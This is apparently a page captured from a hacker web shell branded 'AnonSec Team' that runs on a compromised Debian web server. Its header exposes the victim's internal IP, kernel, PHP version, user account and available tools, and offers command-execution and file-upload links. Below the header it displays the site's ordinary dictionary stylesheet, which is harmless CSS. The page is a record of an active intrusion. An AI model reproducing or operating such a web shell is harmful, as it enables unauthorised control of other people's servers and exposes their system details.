AnonSec Team
Server IP : 10.2.73.233  /  Your IP : 216.73.216.59
Web Server : Apache/2.4.59 (Debian)
System : Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
User : www-data ( 33)
PHP Version : 5.6.40-64+0~20230107.71+debian10~1.gbp673146
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/leksykografia/web/styles/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/leksykografia/web/styles/style.css
/* --------------- reset ---------------*/

html, body, div, span, applet, object, iframe,
h1, h2, h3, h4, h5, h6, p, blockquote, pre,
a, abbr, acronym, address, big, cite, code,
del, dfn, em, img, ins, kbd, q, s, samp,
small, strike, strong, tt, var,
b, u, i, center,
dl, dt, dd, ol, ul, li,
fieldset, form, label, legend,
table, caption, tbody, tfoot, thead, tr, th, td,
article, aside, canvas, details, embed, 
figure, figcaption, footer, header, hgroup, 
menu, nav, output, ruby, section, summary,
time, mark, audio, video {
	margin: 0;
	padding: 0;
	border: 0;
	font-size: 100%;
	vertical-align: baseline;	
}
/* HTML5 display-role reset for older browsers */
article, aside, details, figcaption, figure, 
footer, header, hgroup, menu, nav, section {
	display: block;
}
body {
	line-height: 1;
}
ol, ul {
	list-style: none;
}
blockquote, q {
	quotes: none;
}
blockquote:before, blockquote:after,
q:before, q:after {
	content: '';
	content: none;
}
table {
	border-collapse: collapse;
	border-spacing: 0;
}
/* --------------- generic ---------------*/

body{
	width:100%;
	height:100%;
	background-size: 100%;
	text-align:center;
	margin:0;
	padding:0;
	color:#585858;
	font-size:12px;
	font-family:Verdana;
	
}
a{
	text-decoration:none;
	color:#000;
	cursor:pointer;
}
.left{
	float:left;
	width:480px;	
}
.right{
	float:right;
	width:480px;	
}
#site{
	margin:0 auto;
	width:990px;
	margin:0 auto;
	color:#585858;
}
/* ---------------top---------------*/

#top{
	background:#ffff;
	text-align:left;
}
#communityBar{
	min-width:100%;
	height:25px;	
	padding:10px 0 5px 0;	
}
#communityBar a{ 
	float:right;
	padding:0 6px;	
	line-height:170%;
	font-size:10px;	
}
#statsViewer{
	background:url(../images/stats-viewer.png) no-repeat;
	width:31px;
	height:20px;
	text-align:center;
}
#title{
	color:#093f6e;
	font-size:33px;
	font-family:arial;
	letter-spacing:1.1px;
	margin-right:62px;
	display:inline-block;
	margin-top:10px;
	
}
#subtitle{
	padding-left:0 !important;
	color:#010101;
	font-size:11px;
	letter-spacing:0.25px;
}
#header{
	border-top:1px solid #898989;
	border-bottom:1px solid #898989;
	display:inline-block;
	width:100%;
}
#header li{
	float:left;
	padding:10px 5px 10px 5px;
}
#wklLogo{
	margin-right:18px;
	margin-left: 30px;
}

/* ---------------menu---------------*/

#menu{	
	margin-top:20px;
	float:left;
	padding:0;
}
#menu li{
	display:inline;	

}
#menu li a{		
	color:#6d6d6d;
	vertical-align:top;	
	border-left:2px solid #b7b7b7;
	padding-left:6px;
	padding-right:4px;
}
#menu #home a{
	padding-left:0px !important;
	border:none;
}
#searchBox{
	margin-top:19px;
	float:right;
}
#searchBox input{
	margin-right:5px;
	vertical-align:middle;
}
#searchBox input[type="text"]{
	height:12px;
	width:200px;
	font-size:11px;
	letter-spacing:0.5px;
}
#navigation{
	border-bottom:2px solid #898989;
	height:60px; 
	padding:0;
}
/* ----------------colors----------------*/
.blue{
	color:#00B5E5;
}
.violet{
	color:#4279D4;
}
.orange{
	color:#CC9602;
}
.brown{
	color:#65391C;
}
.gray{
	color:#666666;
}
.silver{
	color:#AFAFAF;
}

.range .blue{
	background:#00B5E5;	
}
.range .violet{
	background:#4279D4;	
}
.range .orange{
	background:#CC9602;	
}
.range .brown{
	background:#65391C;	
}
.range .gray{
	background:#666666;	
}
.range .silver{
	background:#AFAFAF;	
}

.leftBluePointer{
	background:url(../images/left-blue-pointer.png) no-repeat right 15px;	
}
.leftVioletPointer{
	background:url(../images/left-violet-pointer.png) no-repeat right 15px;	
}
.leftOrangePointer{
	background:url(../images/left-orange-pointer.png) no-repeat right 15px;		
}
.leftBrownPointer{
	background:url(../images/left-brown-pointer.png) no-repeat right 15px;		
}
.leftGrayPointer{
	background:url(../images/left-gray-pointer.png) no-repeat right 15px;		
}
.leftSilverPointer{
	background:url(../images/left-silver-pointer.png) no-repeat right 15px;		
}
.rightBluePointer{
	background:url(../images/right-blue-pointer.png) no-repeat left 15px;	
}
.rightVioletPointer{
	background:url(../images/right-violet-pointer.png) no-repeat left 15px;	
}
.rightOrangePointer{
	background:url(../images/right-orange-pointer.png) no-repeat left 15px;	
}
.rightBrownPointer{
	background:url(../images/right-brown-pointer.png) no-repeat left 15px;	
}
.rightGrayPointer{
	background:url(../images/right-gray-pointer.png) no-repeat left 15px;	
}
.rightSilverPointer{
	background:url(../images/right-silver-pointer.png) no-repeat left 15px;	
}
#dictRangeMenu .legend{	
	width:5px;
	height:30px;	
}
#dictRangeMenu .blue, #dictRangeSquares .blue{
	background:#00B5E5;	
}
#dictRangeMenu .violet, #dictRangeSquares .violet{
	background:#4279D4;	
}
#dictRangeMenu .orange, #dictRangeSquares .orange{
	background:#CC9602;	
}
#dictRangeMenu .brown, #dictRangeSquares .brown{
	background:#65391C;	
}
#dictRangeMenu .gray, #dictRangeSquares .gray{
	background:#666666;	
}
#dictRangeMenu .silver, #dictRangeSquares .silver{
	background:#AFAFAF;	
}
/* ----------------content----------------*/

#content{
	padding:15px 0;
	width:100%;
	text-align:left;
	color:#000;
	float:left;
}
#dictionaryTree{
	display:inline-block;
	padding-bottom:15px;
	line-height:14px;
}
.dictionaryRow{
	clear:left;
	float:left;
	width:990px;
	padding-top:7px;
	height:220px;
}
.dictionaryRow li{
	float:left;		
}
.event{
	line-height:14px;
	width:195px;
}
.right > div{
	float:right;
}
.event a span{
	width:120px;
	display:inline-block;
}
.dictionaryRow li.right{
	float:right !important;	
}
.event img{
	padding:0 5px 5px 0;
	float:left;
}
.top{
	max-width:230px;
	margin-top:16px;
}
.bottom{
	max-width:200px;
	margin-top:15px;
}
.thumbnail{	
	margin:16px 10px 0 10px;
}
.center{
	display:block;
	width:36px;
	height:220px;	
}
.description{
	background:blue;
	margin:16px 10px 0 10px
}
.centerLeft{
	float:right;	
	width:185px;
	margin-left:100px;
}
.centerLeft a{
	text-align:left;
	padding-top:35px;
	margin-right:45px;
	display:block;
}
.centerLeft img{
	margin-top:35px;
	float:right;	
	margin-left:0px !important;	
	padding-right:10px;
}
.centerRight a{
	text-align:right;
	display:block;
	margin-left:45px;
	padding-top:35px;
}
.centerRight img{
	margin-top:35px;
	padding-left:10px;
	float:left;	
}
.centerRight{
	width:185px;
	margin-right:10px;
}
.year{
	font-size:22px;
	color:#010101;
	line-height:30px;
}
.range {
	width:36px;
	height:220px;
	border-collapse:separate;
	border-spacing:0 1px;
}
.range td{
	border-left:1px solid #fff;
	border-right:1px solid #fff;
}
/*-------------slider menu--------------*/

.slide {
  position: relative;
}
.slide .inner {
  position: absolute;
  bottom: 0;
}
#dictTypesMenu{
	z-index:100;
	right:-240px;
	top:120px;
	position:fixed;
	background:#ffffff;
	width:270px;
	height:179px;
	text-align:left;
	color:#000;	
}
#dictTypesMenu a{
	color:#000;
	margin-left:-40px;
	padding-left:40px;
}
#dictTypesMenu td{ 
	display:inline-block;	
	padding:3px 5px 4px 5px;
	vertical-align:middle;
}
#dictTypesMenu table{
	height:179px;
	border-collapse:separate;	
	width:200px;
	border-top:5px solid #0060b6;
	border-bottom:5px solid #0060b6;
}
#dictTypesMenu img{
	float:left;
}
#dictRangeMenu{
	z-index:100;
	right:-260px;
	top:320px;
	position:fixed;
	width:290px;
	height:237px;
	background:#ffffff;	
	color:#000;
	text-align:left;
	font-size:10px;
}
#dictRangeMenu img{
	float:left;
}
#dictRangeMenu table{
	height:257px;
	width:250px;
	border-top:5px solid #0087cb;
	border-bottom:5px solid #0087cb;
	border-collapse:separate;
	border-spacing:5px;
}
#dictRangeMenu a{
	color:#000;
	display:block;
	margin-left:-20px;
	padding-left:20px;
}
#dictRangeMenu td{
	display:inline-block;
	vertical-align:middle;	
	margin-top:1px;
	padding:0 5px;
	margin-right:5px;
}
.handler{
	cursor:pointer;
}

/* ---------------topLayer---------------*/
#topLayer
{
	display:none;
    background: #fff;
    opacity:0.3;
    height: 100%;
    position: fixed;
    text-align: center;
    top: 0;
    width: 100%;
    z-index: 99;
}
#topLayerWindow{
	display:none;
	z-index:100;
	background:#ffffff;    
    left: 33%;        
    position: fixed;
    top: 35%;
    width: 430px;
	padding:10px;
	text-align:left;
}
#topLayerWindow > img{
	float:left;
}
#topLayerContent{
	display:inline-block;
    border-left: 3px solid #898989;
    border-right: 3px solid #898989;
    height: 100%;
    padding: 5px 15px;
    width: 390px;
}
#lead{
	float:left;	
}
#lead span{
	display:inline-block;
	width:130px;	
}
#lead img{
	float:left;
	padding:0 10px 10px 0;
}
#closeWindow{
	float:right;
	cursor:pointer;
}
#description{
	clear:both;
	float:left;
	margin-top:10px;
	font-size:13px;
	margin-bottom:20px;
}
#description p{
	width:100%;
	display:inline-block;
}
#next{
	float:right;
	margin-top:30px;
}
/* ---------------compare-view---------------*/
#dictOptions
{
	float:left;
	margin-bottom:30px;
}

#leftDict { 
  float:left;
}
#rightDict { 
  float:right;
}
#compareDictionaries{
	float:left;
	width:990px;
}
#leftDictLabel{
	clear:left;
	color:#676767;
	display:block;
	float:left;
	margin-left:2px;
	margin-bottom:5px;
	font-size:10px;
}
#rightDictLabel{
	font-size:10px;
	color:#676767;
	display:block;
	float:right;
	margin-right:358px;
	margin-bottom:5px;
}
.getEntryPdf{
	float:right;
	width:140px;
	color:#989898;
	padding:10px 0 2px 0;
	margin-bottom:10px;
	border-bottom:1px solid #D7D7D7;
}
.getEntryPdf img{
	float:left;
	padding-right:10px;
}
.getEntryPdf span{
	display:block;
	margin-top:20px;
}

/* ---------------dictionary---------------*/

#dictionaryOptions{
	float:left;
	width:225px;
	height:100%;
	font-size:11px;				
}
#dictionaryOptions .left{	
	width:130px;
}
#dictionaryOptions .getEntryPdf{	
	float:left;
	width:130px;	
}
#dictionaryOptions a{
	color:#858585;
}
	
#dictionaryOptions .right{	
	width:85px;
}
.showEntry{
	padding-top:20px;
	padding-bottom:5px;
	border-bottom:1px solid #D7D7D7;
}

#dictionaryType{
	margin-top:10px;
	float:left;
}
#dictRangeSquares{
	float:right;

}
.square{
	float:right;
	margin:10px 0 5px 8px;
	width:25px;
	height:25px;
}
#dictionaryDescription{
	display: block;
    float: left;
    margin-left: 20px;
    width: 720px;
}
#dictionaryDescription h3 {
    display: inline;
    font-size: 15px;
    line-height: 100%;
}

#dictionaryDescription ul{
	margin-top:40px;	
}
#dictionaryDescription li{
	border-top:1px solid #D8D8D8;
	padding:5px 0 10px 0;
	line-height:120%;
	float:left;	
	display:block;
}
#dictionaryDescription .category{
	width:140px;
	color:#858585;
	font-size:10px;
	display:block;
	float:left;	
	letter-spacing:0.2px;
}
#dictionaryDescription .info{
	display:block;
	float:left;	
	width:540px;
	/*background:url(../images/hide-btn.png) no-repeat right top;*/
	text-align:justify;
}
#dictionaryDescription li{
	width:720px;
}
#dictionaryDescription li a{
	display:block;
	float:right;	
	padding-left:25px;
	width:15px;
	height:9px;
	background:url(../images/hide-btn.png) no-repeat right top; 
}
#entryOptions li{
	width:auto;
}
#entryCategory{
	width:140px !important;
}
#entryInfo{
	width:580px !important;
}
#entryOptions li a{
	background:#fff;
	display:auto;
	float:none;	
	padding-left:none;
	width:auto;
	height:auto;	
}
.toggleButton{
	background:url(../images/show-btn.png) no-repeat right top !important;
}

#dictionaryDescription .fullTitle{
	font-style:italic;
}
#descriptionAuthor{
	color:#939393;
	background:#fff !important; 
}
#entryOptions li{
	width:120px;
	padding:5px 0;
}
#entryOptions #getPdf{		
    background: url("../images/pdf-icon.png") no-repeat scroll center center transparent;
    border-top: medium none;
    margin-top: -50px;
    padding-top: 80px;
}
#entryOptions #getPdf a{
	display:block;
	height:100%;
}
#entryOptions #getPdf span{
	color:#B2B2B2 !important;
}
#entryOptions span{
	width:120px !important;
}
/* ---------------footer---------------*/

#footer{
	clear:both;
	margin-top:15px;
	color:#858585;
	border-top:2px solid #858585;
	font-size:9px;	
}
#footerLinks{
	width:100%;
	float:right;
	border-bottom:1px solid #858585;
}
#footerLinks a{	
	display:block;
	float:right;
	margin:8px 5px;
	font-size:11px;
	color:#6D6D6D;
	padding-left:10px;

}
#footerLinks #contact{
	border-left:2px solid #b7b7b7;
}
#footerLogos{
	float:left;
	padding:10px 0;
}
#footerLogos img{
	vertical-align:middle;
	padding:0px 13px;
}
#footerLogos .first{
	padding-left:0px;
}
#footerLogos .last{
	padding-right:0px;
}
#copyrights{
	text-align:left;
	clear:both;
	border-top:1px solid #858585;
	padding:5px 0;
}

AnonSec - 2021